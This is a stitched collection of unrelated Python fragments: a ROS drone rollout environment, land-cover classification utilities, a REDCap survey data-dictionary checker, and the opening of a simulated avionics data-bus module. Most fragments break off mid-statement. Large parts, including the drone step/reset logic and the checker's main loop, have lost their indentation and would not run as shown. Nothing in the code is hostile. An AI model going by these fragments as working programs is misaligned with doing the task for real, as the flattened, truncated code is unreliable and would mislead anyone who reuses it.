self.action_space.high), "warn")
action = np.clip(action, self.action_space.low, self.action_space.high)
if self._get_joy_coll_stop() or self._get_trash_rollout():
self._set_motion(0,0,0,0)
else:
yaw = action[0]
self._set_motion(self._fixed_velocity, 0, yaw, 0)
if not offline:
rospy.sleep(max(0., self._dt - (rospy.Time.now() - self._last_step_time).to_sec()))
self._last_step_time = rospy.Time.now()
done = self._get_done()
if done:
self._log('Done after {0} steps'.format(self._t), "warn")
if self._get_collision():
self._log('-- COLLISION --', "warn")
elif self._get_joy_stop() or self._get_joy_coll_stop():
self._log('-- MANUALLY STOPPED --', "warn")
elif self._get_trash_rollout():
self._log('-- TRASHING ROLLOUT --', "warn")
else:
self._log('-- DONE for unknown reason --', "warn")
if not offline and self._ros_rolloutbag.is_open:
#change last collision msg to have a 1 if manually noted a collision
if self._get_joy_coll_stop():
self._ros_msgs[[topic for topic in self._ros_msgs if 'coll' in topic][0]].data = 1
self._ros_rolloutbag.write_all(self._ros_topics_and_types.keys(), self._ros_msgs, self._ros_msg_times)
if done:
self._log('Done after {0} steps'.format(self._t), "debug")
self._t = 0
next_observation = self._get_observation()
goal = self._get_goal()
reward = self._get_reward()
env_info = dict()
self._t += 1
return next_observation, goal, reward, done, env_info
    def reset_state(self):
        """Clear per-rollout state: timers, latched joystick flags, velocity.

        A fresh forward velocity is sampled from the configured range so each
        rollout can use a different speed.
        """
        self._last_step_time = rospy.Time.now()
        self._is_collision = False
        self._t = 0
        self._done = False
        # Clear the latched joystick button state (see _joy_cb).
        self._curr_joy = None
        self._start_pressed = False
        self._stop_pressed = False
        self._trash_rollout = False
        self._coll_stop_pressed = False
        self._send_override = False
        self._fixed_velocity = np.random.uniform(self._fixed_velocity_range[0], self._fixed_velocity_range[1])
        self._log('Velocity: {0}'.format(self._fixed_velocity), "debug")
def reset(self, offline=False, keep_rosbag=True):
self.resetting = True
if offline:
self._is_collision = False
return self._get_observation(), self._get_goal()
assert self.ros_is_good(), "On End: ROS IS NOT GOOD"
manual_collision_label= self._get_joy_coll_stop()
trash_rollout = self._get_trash_rollout()
if self._ros_rolloutbag.is_open and (trash_rollout or not keep_rosbag or self._get_joy_stop()):
# should've been closed in step when done
self._log('Trashing bag', "debug")
self._ros_rolloutbag.trash()
if self._is_collision:
self._log('Resetting (collision)', "debug")
elif self._get_joy_stop():
self._log('Resetting (joy stop)', "debug")
elif self._get_joy_coll_stop():
self._log('Resetting (joy collision stop)', "debug")
# if manual collision label pressed, start new episode, but skip landing and takeoff
elif self._get_trash_rollout():
self._log('Resetting (trash rollout)', "debug")
else:
self._log('Resetting (other)', "debug")
# end behavior
if not manual_collision_label and not trash_rollout:
self._log("Landing.", 'debug')
self._set_command(0) # land
rospy.sleep(2.0)
else:
self._send_override = True
self._set_motion(0,0,0,0) # stay hovering
time.sleep(1.0) # stopping motion
# if its still open, that means it wasn't flagged to be trashed
# this happens after landing to save battery
if self._ros_rolloutbag.is_open:
#if is collision and config says we need to save, then save on user input, else just save always
if self._is_collision and self._prompt_save_rollout_on_coll:
self._log("Real Collision Happened. Save Rollout? (y/n) default [y]: ", "warn")
res = input()
if res is '' or res is 'y':
self._log('Saving bag', "debug")
self._ros_rolloutbag.close()
else:
self._log('Trashing bag', "debug")
self._ros_rolloutbag.trash()
else:
self._ros_rolloutbag.close()
# other cases
if self._press_enter_on_reset:
self._log('Resetting, press enter to continue', "info")
input()
elif not manual_collision_label and not trash_rollout and self.is_upside_down():
self._log('Crazyflie is upside down', "info")
self._log('Resetting, press enter to continue', "info")
input()
self.reset_state()
assert self.ros_is_good() # "On Start: ROS IS NOT GOOD"
if not manual_collision_label and not trash_rollout:
self._log("Waiting to takeoff ...", "debug")
rospy.sleep(1.0)
self._log("Taking off", "debug")
self._set_command(2)
rospy.sleep(2.0)
#readjustment means full joystick control until you press A (this replaces Wait For Start)
| |
# Source repository: yoozze/lulc-classification (GitHub stars: 0)
"""Miscellaneous utilities
"""
import hashlib
import json
import math
import os
import re
import time
from datetime import datetime
# from pathlib import Path
import geopandas as gpd
import numpy as np
from eolearn.core import EOPatch
from src.utils import const
def get_hash(d):
    """Calculate an MD5 hash of any JSON-serializable object `d`.

    Keys are sorted during serialization, so logically equal dicts hash
    identically. (Docstring fix: despite the parameter name, callers in this
    module pass lists as well as dicts — anything ``json.dumps`` accepts works.)

    :param d: JSON-serializable object from which hash will be calculated.
    :type d: object
    :return: Hexadecimal hash string.
    :rtype: str
    """
    json_str = json.dumps(d, sort_keys=True).encode('utf-8')
    return hashlib.md5(json_str).hexdigest()
def get_raw_data_dir(cfg):
    """Get path to hash directory inside of raw data directory. Hash is
    based on given configuration.

    :param cfg: Configuration
    :type cfg: dict
    :return: Raw data directory.
    :rtype: Path
    """
    # The hash covers exactly the config sections that affect raw downloads.
    keys = ('AOI', 'time_interval', 'sh_inputs')
    return const.DATA_RAW_DIR / get_hash([cfg.get(key, None) for key in keys])
def get_processed_data_dir(cfg):
    """Get path to hash directory inside of processed data directory. Hash is
    based on given configuration.

    :param cfg: Configuration
    :type cfg: dict
    :return: Processed data directory.
    :rtype: Path
    """
    # Every config section that influences preprocessing participates
    # in the hash, so a change in any of them yields a new directory.
    keys = (
        'AOI', 'time_interval', 'sh_inputs', 'reference_data',
        'cloud_detection', 'valid_data', 'filter', 'interpolation',
        'features', 'gradient', 'edges', 'raster', 'preprocess_save',
    )
    return const.DATA_PROCESSED_DIR / get_hash([cfg.get(key, None) for key in keys])
def get_sampled_data_dir(cfg):
    """Get path to hash directory inside of sampled data directory. Hash is
    based on given configuration.

    :param cfg: Configuration
    :type cfg: dict
    :return: Sampled data directory.
    :rtype: Path
    """
    # Same sections as the processed stage, plus 'sampling'.
    keys = (
        'AOI', 'time_interval', 'sh_inputs', 'reference_data',
        'cloud_detection', 'valid_data', 'filter', 'interpolation',
        'features', 'gradient', 'edges', 'raster', 'preprocess_save',
        'sampling',
    )
    return const.DATA_SAMPLED_DIR / get_hash([cfg.get(key, None) for key in keys])
def get_final_data_dir(cfg):
    """Get path to hash directory inside of final data directory. Hash is
    based on given configuration.

    :param cfg: Configuration
    :type cfg: dict
    :return: Final data directory.
    :rtype: Path
    """
    # Same sections as the sampled stage, plus 'timeless_features'.
    keys = (
        'AOI', 'time_interval', 'sh_inputs', 'reference_data',
        'cloud_detection', 'valid_data', 'filter', 'interpolation',
        'features', 'gradient', 'edges', 'raster', 'preprocess_save',
        'sampling', 'timeless_features',
    )
    return const.DATA_FINAL_DIR / get_hash([cfg.get(key, None) for key in keys])
def get_models_dir(cfg):
    """Get path to hash directory inside of models directory. Hash is based on
    given configuration.

    :param cfg: Configuration
    :type cfg: dict
    :return: Models directory.
    :rtype: Path
    """
    # Same sections as the final-data stage, plus 'modelling'.
    keys = (
        'AOI', 'time_interval', 'sh_inputs', 'reference_data',
        'cloud_detection', 'valid_data', 'filter', 'interpolation',
        'features', 'gradient', 'edges', 'raster', 'preprocess_save',
        'sampling', 'timeless_features', 'modelling',
    )
    return const.MODELS_DIR / get_hash([cfg.get(key, None) for key in keys])
def get_date_time_dir_name(timestamp=None):
    """Format (given) timestamp with file system safe characters.

    If timestamp is not provided, current time is used.

    Bug fix: the default used to be ``timestamp=time.time()``, which Python
    evaluates once at import time — every defaulted call returned the module
    load time instead of "now". A ``None`` sentinel restores the documented
    behavior.

    :param timestamp: Unix timestamp, defaults to None (meaning current time)
    :type timestamp: float, optional
    :return: File system safe date-time string
    :rtype: str
    """
    if timestamp is None:
        timestamp = time.time()
    date_time = datetime.fromtimestamp(timestamp)
    return date_time.strftime('%Y-%m-%d_%H-%M-%S')
def get_report_subdir(config_name, timestamp, subdir):
    """Get subdirectory in reports directory with configuration name and
    timestamp parents.

    :param config_name: Configuration name
    :type config_name: string
    :param timestamp: Unix timestamp
    :type timestamp: float
    :param subdir: Subdirectory name
    :type subdir: string
    :return: Subdirectory path
    :rtype: Path
    """
    # Layout: <reports>/<config>/<YYYY-mm-dd_HH-MM-SS>/<subdir>
    run_dir = get_date_time_dir_name(timestamp)
    return const.REPORTS_DIR.joinpath(config_name, run_dir, subdir)
def save_results(results, name, config_name, timestamp):
    """Save results to file defined by name, directory name and timestamp.

    :param results: Results dictionary.
    :type results: dict
    :param name: Results file name.
        If file path is used, e.g. `__file__`, only base name without extension
        will be used.
    :type name: str
    :param config_name: Configuration name
    :type config_name: str
    :param timestamp: Unix timestamp
    :type timestamp: float
    """
    results_name = os.path.splitext(os.path.basename(name))[0]
    results_dir = get_report_subdir(config_name, timestamp, 'results')
    # `exist_ok=True` removes the race between the old is_dir() check
    # and mkdir() when several processes report concurrently.
    results_dir.mkdir(parents=True, exist_ok=True)
    json_path = results_dir / f'{results_name}.json'
    with open(json_path, 'w', encoding='utf-8') as json_file:
        json.dump(results, json_file)
def format_data_size(size_bytes):
    """Format given data size as a human-readable string.

    :param size_bytes: Size in bytes.
    :type size_bytes: int
    :return: Formatted size, e.g. ``"1.5 KB"``.
    :rtype: str
    """
    if size_bytes == 0:
        return "0B"
    units = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
    # Pick the largest power of 1024 that fits.
    exponent = int(math.floor(math.log(size_bytes, 1024)))
    scaled = round(size_bytes / math.pow(1024, exponent), 2)
    return "%s %s" % (scaled, units[exponent])
def get_dir_size(start_path='.'):
    """Calculate the size of a given directory.

    :param start_path: Directory path, defaults to '.'
    :type start_path: str, optional
    :return: Size in bytes of given directory, including all subdirectories.
    :rtype: int
    """
    total = 0
    for dirpath, _dirnames, filenames in os.walk(start_path):
        # Sum the sizes of the regular files in this directory level.
        total += sum(
            os.path.getsize(os.path.join(dirpath, fname)) for fname in filenames
        )
    return total
def eval_obj(obj, globals, locals):
    """Evaluate given object.

    Only string keys and values fully enclosed in `${...}` are evaluated.
    Dicts are rebuilt (keys may change after evaluation); lists are mutated
    in place; other values pass through unchanged.

    SECURITY NOTE: this calls ``eval`` on the embedded expression — only ever
    feed it trusted, local configuration, never external input.

    :param obj: Object to be evaluated.
    :type obj: object
    :param globals: Dictionary of global variables to be used for evaluation.
    :type globals: dict[str, object]
    :param locals: Dictionary of local variables to be used for evaluation.
    :type locals: dict[str, object]
    :return: Evaluated object
    :rtype: object
    """
    if isinstance(obj, dict):
        # Rebuild the dict because evaluated keys may differ from originals.
        new_obj = {}
        for k, v in obj.items():
            new_key = eval_obj(k, globals, locals)
            new_obj[new_key] = eval_obj(v, globals, locals)
        obj = new_obj
    elif isinstance(obj, list):
        # NOTE: lists are modified in place (callers see the mutation).
        for i, v in enumerate(obj):
            obj[i] = eval_obj(v, globals, locals)
    else:
        if isinstance(obj, str):
            # Match strings that are exactly "${<expression>}".
            match = re.match(r'^(\$\{)([^}]+)\}$', obj)
            if match:
                obj = eval(match.group(2), globals, locals)
    return obj
def get_region_paths(cfg, region, data_dir=None):
    """Get matrix of raw eopatch paths, defined by selected region.

    :param cfg: Configuration
    :type cfg: dict
    :param region: Region defined by range of tile indices,
        as [[min_x, min_y], [max_x, max_y]].
    :type region: list[list[int, int], list[int, int]]
    :param data_dir: Data directory with eopatches. Defaults to `None`
        (the raw data directory for this configuration is used).
    :type data_dir: Path, optional
    :return: Matrix of paths to eopatches.
    :rtype: np.array(Path)
    """
    raw_data_dir = get_raw_data_dir(cfg)
    aoi_dir = raw_data_dir / 'AOI'
    aoi = gpd.read_file(aoi_dir / 'aoi.shp')
    # Query selected tiles within given region.
    indices = aoi.index[
        (aoi['selected'] == 1)
        & aoi['index_x'].between(region[0][0], region[1][0])
        & aoi['index_y'].between(region[0][1], region[1][1])
    ]
    if not data_dir:
        data_dir = raw_data_dir
    patches_dir = data_dir / 'patches'
    # Create matrix.
    rows = region[1][1] - region[0][1] + 1
    cols = region[1][0] - region[0][0] + 1
    paths = np.array(
        [str(patches_dir / f'eopatch_{idx}') for idx in indices]
    ).reshape(rows, cols)
    # Reorder tiles. NOTE(review): the flip/transpose combination converts
    # the shapefile's tile enumeration order into an x/y grid layout —
    # presumably row-major with y increasing upward; verify against the
    # AOI shapefile generation code before changing.
    if (rows > 1) and (cols > 1):
        paths = np.transpose(np.fliplr(paths))
    elif cols > 1:
        paths = np.transpose(paths)
    else:
        paths = np.transpose(np.flipud(paths))
    return paths
def get_aoi_bbox(cfg, aoi=None):
    """Get bounding box of AOI.

    :param cfg: Configuration
    :type cfg: dict
    :param aoi: GeoDataFrame of AOI, defaults to None (loaded from the raw
        data directory for this configuration)
    :type aoi: GeoDataFrame, optional
    :return: Bounding box of AOI as (minx, miny, maxx, maxy).
    :rtype: tuple[float, float, float, float]

    Bug fix: the original guard was ``if not aoi:`` — evaluating a
    (Geo)DataFrame in boolean context raises
    ``ValueError: The truth value of a DataFrame is ambiguous``, so the
    function crashed whenever a frame was actually passed in. An explicit
    ``is None`` check is required here.
    """
    if aoi is None:
        aoi = gpd.read_file(str(get_raw_data_dir(cfg) / 'AOI'))
    # Get bounds of all selected bounding boxes.
    bounds = aoi[aoi.selected == 1].bounds
    return (
        bounds['minx'].min(), bounds['miny'].min(),
        bounds['maxx'].max(), bounds['maxy'].max()
    )
def get_bounds_from_values(values):
    """Get list of bounds from given list of numeric values.

    Bounds are the midpoints between consecutive values, with the first and
    last bounds extrapolated outward by half of the adjacent interval, so
    ``len(bounds) == len(values) + 1`` for two or more values.

    :param values: List of numeric values
    :type values: list[int or float]
    :return: List of bounds
    :rtype: list[float]
    """
    n = len(values)
    bounds = []
    for i, value in enumerate(values):
        if i < n - 1:
            half_step = (values[i + 1] - value) / 2
            if i == 0:
                # Extrapolate the lower edge below the first value.
                bounds.append(value - half_step)
            bounds.append(value + half_step)
        else:
            # Extrapolate the upper edge past the last value using the
            # final interval's half-width.
            half_step = (value - values[i - 1]) / 2
            bounds.append(value + half_step)
    return bounds
def nan_helper(y):
    """Helper to handle indices and logical indices of NaNs.

    Input:
        - y, 1d numpy array with possible NaNs
    Output:
        - nans, logical indices of NaNs
        - index, a function, with signature indices = index(logical_indices),
          to convert logical indices of NaNs to 'equivalent' indices
    Example:
        >>> # linear interpolation of NaNs
        >>> nans, x = nan_helper(y)
        >>> y[nans] = np.interp(x(nans), x(~nans), y[~nans])
    """
    def index_of(logical_mask):
        # Positions where the boolean mask is True.
        return logical_mask.nonzero()[0]

    return np.isnan(y), index_of
def interpolate_array(y):
    """Linearly interpolate NaN gaps in a 1-d float array, in place.

    Arrays with a run of more than two consecutive NaNs, or that begin/end
    with two NaNs, are considered irreparable and ``None`` is returned.

    Bug fix: the NaN check called ``math.isnan()`` with no argument, which
    raised ``TypeError`` on the first element whenever the array contained
    any NaN at all; it now checks the current element ``yi``.

    :param y: 1-d numpy array (modified in place when interpolation happens).
    :return: The (possibly interpolated) array, or ``None`` if irreparable.
    """
    # If nothing to interpolate, return original.
    if not np.isnan(y).any():
        return y
    nan_count = 0
    y_len = len(y)
    # Check if array is repairable.
    for i, yi in enumerate(y):
        if math.isnan(yi):
            nan_count += 1
        else:
            nan_count = 0
        # If more than two nans in a sequence, don't interpolate.
        if nan_count > 2:
            return None
        # If array starts or ends with more than one nan, don't interpolate.
        if (i == 1 and nan_count == 2) or (i == y_len - 1 and nan_count == 2):
            return None
    # Interpolate over the NaN positions. (The nan_helper logic is inlined
    # here so this function is self-contained: flatnonzero(mask) is
    # equivalent to mask.nonzero()[0] for 1-d arrays.)
    nans = np.isnan(y)
    y[nans] = np.interp(np.flatnonzero(nans), np.flatnonzero(~nans), y[~nans])
    return y
def load_sample_subset(input_dir, subset_id):
eopatches = []
for path in input_dir.iterdir():
eopatch = EOPatch.load(str(path), lazy_loading=True)
if eopatch.meta_info['subset'] == subset_id:
eopatches.append(eopatch)
else:
del eopatch
eopatches = np.array(eopatches)
X = np.array([
eopatch.data['FEATURES_SAMPLED']
for eopatch in eopatches
])
y = np.array([
eopatch.mask_timeless['REF_PROCESSED_SAMPLED']
for eopatch in eopatches
| |
# GitHub stars: 1-10
import os
import pandas as pd
from datetime import datetime
def stripTags(string):
    """Recursively remove every well-formed <...> tag pair from ``string``.

    Only removes a pair when an opening '<' appears before a closing '>';
    stray brackets in other orders are left untouched.
    """
    open_idx = string.find("<")
    close_idx = string.find(">")
    # Stop when no "<...>" pair remains (in that order).
    if open_idx == -1 or close_idx == -1 or open_idx >= close_idx:
        return string
    return stripTags(string[:open_idx] + string[close_idx + 1:])
def removeDayTag(strIn):
    """Strip the leading day tag (one letter plus day digits) from a field name.

    NOTE(review): the branch slice widths look inconsistent — a 4-digit run
    strips 3 characters while a 3-digit run strips only 2, and the 2-digit
    branch also strips 3. Without the exact field-name format this cannot be
    confirmed from here; verify against the data dictionary before changing.
    """
    # Probe how many characters after the first are digits.
    first2 = strIn[1:3].isdigit()
    first3 = strIn[1:4].isdigit()
    first4 = strIn[1:5].isdigit()
    if first4:
        return strIn[3:]
    elif first3:
        return strIn[2:]
    elif first2:
        return strIn[3:]
    else:
        # Single-digit day: strip the letter and one digit.
        return strIn[2:]
def getDay(strIn):
    """Parse the numeric day out of a prefixed field name (e.g. ``d12_field``).

    Fix: removed the unused local ``first1`` (assigned but never read).

    NOTE(review): like removeDayTag, the 3- and 4-digit branches parse fewer
    digits than they detect — confirm the intended field-name format before
    relying on those paths.

    :param strIn: Field name whose characters from index 1 hold the day digits.
    :return: Day number as an int.
    """
    # Probe how many characters after the first are digits.
    first2 = strIn[1:3].isdigit()
    first3 = strIn[1:4].isdigit()
    first4 = strIn[1:5].isdigit()
    if first4:
        return int(strIn[1:3])
    elif first3:
        return int(strIn[1:2])
    elif first2:
        return int(strIn[1:3])
    else:
        return int(strIn[1:2])
def checkReferenceBranching(strIn):
    """Parse a REDCap branching-logic string into {field: expected_answer}.

    The input is split on "or"; each condition is expected to look like
    ``[dNNfield] = 'value'``. Fields have their day tag stripped; quoted
    values are parsed as ints, and conditions without "=" map to "<>".

    NOTE(review): if a condition contains "=" but the value is neither
    single- nor double-quoted, ``varAnsInt`` is never assigned and the
    assignment below raises UnboundLocalError — confirm all dictionary
    entries are quoted, or guard this case.
    """
    conditions = strIn.split("or")
    dictOut = {}
    for i in range(len(conditions)):
        # Field name sits between the square brackets.
        iOpenBracket = conditions[i].find("[")
        iCloseBracket = conditions[i].find("]")
        varField = removeDayTag(conditions[i][iOpenBracket + 1:iCloseBracket])
        varAns = conditions[i][iCloseBracket + 1:]
        if "=" in varAns:
            if "'" in varAns:
                iOpenStr = varAns.find("'")
                iCloseStr = varAns.rfind("'")
                varAnsInt = int(varAns[iOpenStr + 1:iCloseStr])
            elif '"' in varAns:
                iOpenStr = varAns.find('"')
                iCloseStr = varAns.rfind('"')
                varAnsInt = int(varAns[iOpenStr + 1:iCloseStr])
            dictOut[varField] = varAnsInt
        else:
            # No "=" in the condition: record a not-equal marker.
            dictOut[varField] = "<>"
    return dictOut
def checkSelfBranching(strIn, expDay):
    """Return indices of the OR-separated conditions that refer to day ``expDay``.

    Conditions containing "=" have their day parsed from the bracketed field
    name; conditions without "=" are assumed to refer to ``expDay`` itself.
    """
    days = []
    for condition in strIn.split("or"):
        if "=" in condition:
            open_idx = condition.find("[")
            close_idx = condition.find("]")
            days.append(getDay(condition[open_idx + 1:close_idx]))
        else:
            # No comparison present: treat as referring to the expected day.
            days.append(expDay)
    return [i for i, day in enumerate(days) if day == expDay]
def normalizeEntry(strIn):
    """Coerce *strIn* to str and trim surrounding whitespace."""
    return str(strIn).strip()
if __name__ == "__main__":
while True:
usrIn = input("Enter a data dictionary path or 'quit' to quit program: ")
if usrIn == 'quit':
break
else:
try:
baseDF = pd.read_csv(usrIn)
except Exception as e:
print(e)
continue
else:
# Generating file name
currDateTime = datetime.now().strftime("%Y-%m-%d_%I-%M-%S-%p")
absFilepath = os.path.join(os.getcwd(), f"W4_DataDictionary_Check_{currDateTime}.txt")
print(f"Collecting values from {usrIn}")
baseDF = pd.read_csv(usrIn, low_memory=False)
day1 = pd.DataFrame(columns=baseDF.columns)
day2 = pd.DataFrame(columns=baseDF.columns)
day3 = pd.DataFrame(columns=baseDF.columns)
day4 = pd.DataFrame(columns=baseDF.columns)
day5 = pd.DataFrame(columns=baseDF.columns)
day6 = pd.DataFrame(columns=baseDF.columns)
day7 = pd.DataFrame(columns=baseDF.columns)
day8 = pd.DataFrame(columns=baseDF.columns)
day9 = pd.DataFrame(columns=baseDF.columns)
day10 = pd.DataFrame(columns=baseDF.columns)
day11 = pd.DataFrame(columns=baseDF.columns)
day12 = pd.DataFrame(columns=baseDF.columns)
day13 = pd.DataFrame(columns=baseDF.columns)
day14 = pd.DataFrame(columns=baseDF.columns)
for index, row in baseDF.iterrows():
if row["Form Name"] == "day_1_monday_daily_survey":
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day1 = day1.append(row)
if "day_2" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day2 = day2.append(row)
if "day_3" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day3 = day3.append(row)
if "day_4" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day4 = day4.append(row)
if "day_5" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day5 = day5.append(row)
if "day_6" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day6 = day6.append(row)
if "day_7" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day7 = day7.append(row)
if "day_8" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day8 = day8.append(row)
if "day_9" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day9 = day9.append(row)
if "day_10" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][3:]
day10 = day10.append(row)
if "day_11" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][3:]
day11 = day11.append(row)
if "day_12" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][3:]
day12 = day12.append(row)
if "day_13" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][3:]
day13 = day13.append(row)
if "day_14" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][3:]
day14 = day14.append(row)
allDays = [day1, day2, day3, day4, day5, day6, day7, day8, day9, day10, day11, day12, day13, day14]
for i in range(len(allDays)):
newIndex = allDays[i].index - allDays[i].index[0]
allDays[i] = allDays[i].set_index(newIndex)
# Collecting days, putting in otherDays dictionary
otherDays = {}
for i in range(1, len(allDays)):
otherDays[i + 1] = allDays[i]
# Process list of variable field names - Day 1 (Referential)
day1Vars = allDays[0]['Variable / Field Name'].to_list()
for i in range(len(day1Vars)):
day1Vars[i] = str(day1Vars[i])
with open(absFilepath, "w") as fileOut:
# For each day (days 2-14)
for day in otherDays:
dayHeaderString = "------------------------------------------------------------\n" + '###\n'.join(['' for _ in range(3)]) + f"### Day {day}:\n" + '##\n'.join(['' for _ in range(3)]) + "------------------------------------------------------------ "
print(dayHeaderString)
fileOut.write("\n" + dayHeaderString)
# Process list of variable field names - Day x (Comparison)
dayVars = otherDays[day]['Variable / Field Name'].to_list()
dayVars = otherDays[day]['Variable / Field Name'].to_list()
# Checking for variables in day 1 but not in day x
[print(f"Day {day}: Missing t{day}{day1Vars[i]}") for i in range(len(day1Vars)) if
not (day1Vars[i] in dayVars)]
[fileOut.write(f"\nDay {day}: Missing t{day}{day1Vars[i]}") for i in range(len(day1Vars)) if
not (day1Vars[i] in dayVars)]
# Checking for variables in day x but not in day 1
[print(f"Day 1: Missing t1{dayVars[i]} (referencing t{day}{dayVars[i]})") for i in
range(len(dayVars)) if not (dayVars[i] in day1Vars)]
[fileOut.write(f"\nDay 1: Missing t1{dayVars[i]} (referencing t{day}{dayVars[i]})") for i in
range(len(dayVars)) if not (dayVars[i] in day1Vars)]
# Check the order of variables
for index, row in otherDays[day].iterrows():
if row['Variable / Field Name'] != allDays[0].loc[index, 'Variable / Field Name']:
print(
f"MISMATCHED ORDER: Day 1 {allDays[0].loc[index, 'Variable / Field Name']}; Day {day} - {row['Variable / Field Name']} ")
fileOut.write(
f"\nMISMATCHED ORDER: Day 1 {allDays[0].loc[index, 'Variable / Field Name']}; Day {day} - {row['Variable / Field Name']} ")
# for each variable (field) of a single day
for index, row in otherDays[day].iterrows():
if pd.Series.all(row == allDays[0].columns):
continue
currRefVar = pd.Series()
# determine the corresponding variable (field) in day 1
for _, row2 in allDays[0].iterrows():
if row2['Variable / Field Name'] == row['Variable / Field Name']:
currRefVar = row2
break
# checking branching logic
if pd.isna(row['Branching Logic (Show field only if...)']):
if len(currRefVar) > 0 and not pd.isna(
currRefVar['Branching Logic (Show field only if...)']):
print(
f"\n## BRANCHING: Day {day} - {row['Variable / Field Name']} is empty (expected branching)")
fileOut.write(
f"\n\n## BRANCHING: Day {day} - {row['Variable / Field Name']} is empty (expected branching)")
elif not len(currRefVar):
print(
f"\n## BRANCHING: DAY {day} - {row['Variable / Field Name']} does not have a matching variable in day 1")
fileOut.write(
f"\n\n## BRANCHING: DAY {day} - {row['Variable / Field Name']} does not have a matching variable in day 1")
else:
currDict = checkReferenceBranching(row["Branching Logic (Show field only if...)"])
refDict = checkReferenceBranching(currRefVar["Branching Logic (Show field only if...)"])
if currDict != refDict:
print(
f"\n## BRANCHING: Day {day} - {row['Variable / Field Name']} Branching Logic does not match day 1")
print(f"\n\tDay {day} - {currDict}")
print(f"\n\tDay 1 - {refDict}")
fileOut.write(
f"\n\n## BRANCHING: Day {day} - {row['Variable / Field Name']} Branching Logic does not match day 1")
fileOut.write(f"\n\n\tDay {day} - {currDict}")
fileOut.write(f"\n\n\tDay 1 - {refDict}")
if not checkSelfBranching(row["Branching Logic (Show field only if...)"], day):
print(
f"\n## BRANCHING: Day {day} - {row['Variable / Field Name']} Inconsistent branching requirements (not contained within day):\n\t{row['Branching Logic (Show field only if...)']}")
fileOut.write(
f"\n\n## BRANCHING: Day {day} - {row['Variable / Field Name']} Inconsistent branching requirements (not contained within day):\n\t{row['Branching Logic (Show field only if...)']}")
currField = row['Field Label']
if not pd.isna(currField):
currField = normalizeEntry(currField)
if "tuesday" in currField and day % 7 == 3:
currField = currField.replace("tuesday", "sunday")
elif "wednesday" in currField and day % 7 == 4:
currField = currField.replace("wednesday", "sunday")
elif "thursday" in currField and day % 7 == 5:
currField = currField.replace("thursday", "sunday")
elif "friday" in currField and day % 7 == 6:
currField = currField.replace("friday", "sunday")
elif "saturday" in currField and day % 7 == 0:
currField = currField.replace("saturday", "sunday")
elif "monday" in currField and day % 7 == 2:
currField = currField.replace("monday", "sunday")
if "martes" in currField and day % 7 == 3:
currField = currField.replace("martes", "domingo")
elif "miercoles" in currField and day % 7 == 4:
currField = currField.replace("miercoles", "domingo")
elif "jueves" in currField and day % 7 == 5:
currField = currField.replace("jueves", "domingo")
elif "viernes" in currField and day % 7 == 6:
currField = currField.replace("viernes", "domingo")
elif "sabado" in currField and day % 7 == 0:
currField = currField.replace("sabado", "domingo")
elif "lunes" in currField and day % 7 == 2:
currField = currField.replace("lunes", "domingo")
if "miércoles" in currField and day % 7 == 4:
| |
import logging as log
from multiprocessing import Event
import socket
from odf.config import config
import time
import uuid
from enum import Enum
from typing import ClassVar, Generator, List
from collections import defaultdict
from odf.utils import delay
import struct
from datetime import datetime, timedelta
import jsonpickle
# class that represents a word which can be sent over the bus
# Base class for a single word (command/status/data) travelling over the
# simulated bus.
class Word():
    # marked True when the word originates from a fake device
    fake = False

    def check_parity(self):
        """Validate the trailing parity bit; parity is not modelled yet, so always True."""
        return True

    def __str__(self) -> str:
        # class name left-justified to 7 columns, plus a separating space
        return '{:<7} '.format(type(self).__name__)

    def to_bytes(self):
        """Serialize this word for the wire as UTF-8 jsonpickle JSON."""
        return jsonpickle.encode(self).encode('utf8')

    @classmethod
    def from_bytes(cls, bytes):
        """Inverse of to_bytes(): rebuild a word from its wire form."""
        return jsonpickle.decode(bytes.decode('utf8'))
# The contents of a status word which can be sent over the bus
# Status word returned by a remote terminal (RT) in reply to a command.
# Every field is held as a string of bit characters.
class Status(Word):
    def __init__(
        self,
        address='0',                        # address of the RT issuing the status word
        message_error_bit='0',              # 1 if a received data word failed processing
        instrumentation_bit='0',            # distinguishes command vs status word; always 0
        service_request_bit='0',            # set to request a non-periodic data transfer
        reserved_bits='000',                # reserved for future use; always 0
        brdcst_received_bit='0',            # set when the preceding command was a broadcast
        busy_bit='0',                       # set when the subsystem cannot move data
        subsystem_flag_bit='0',             # set when the RT subsystem cannot process the data
        dynamic_bus_control_accpt_bit='0',  # set on acceptance of dynamic bus control
        terminal_flag_bit='1',              # set on an RT fault condition
        parity_bit='1',                     # parity bit
    ) -> None:
        super().__init__()
        for field, bits in (
            ('address', address),
            ('message_error_bit', message_error_bit),
            ('instrumentation_bit', instrumentation_bit),
            ('service_request_bit', service_request_bit),
            ('reserved_bits', reserved_bits),
            ('brdcst_received_bit', brdcst_received_bit),
            ('busy_bit', busy_bit),
            ('subsystem_flag_bit', subsystem_flag_bit),
            ('dynamic_bus_control_accpt_bit', dynamic_bus_control_accpt_bit),
            ('terminal_flag_bit', terminal_flag_bit),
            ('parity_bit', parity_bit),
        ):
            setattr(self, field, bits)

    def __str__(self) -> str:
        # render as '(ad-0, br-0, ...)': two-letter field prefix plus value,
        # sorted by attribute name
        pairs = sorted(vars(self).items())
        return super().__str__() + '(' + ', '.join(k[:2] + '-' + str(v) for k, v in pairs) + ')'
# the content of a data word
# A data word: sixteen bits of payload followed by an (implicit) parity bit.
class Data(Word):
    def __init__(self, data=0xffff) -> None:
        """Wrap *data* as two raw bytes; ints are encoded big-endian."""
        super().__init__()
        if not isinstance(data, bytes):
            data = data.to_bytes(2, byteorder='big')
        self.data = data

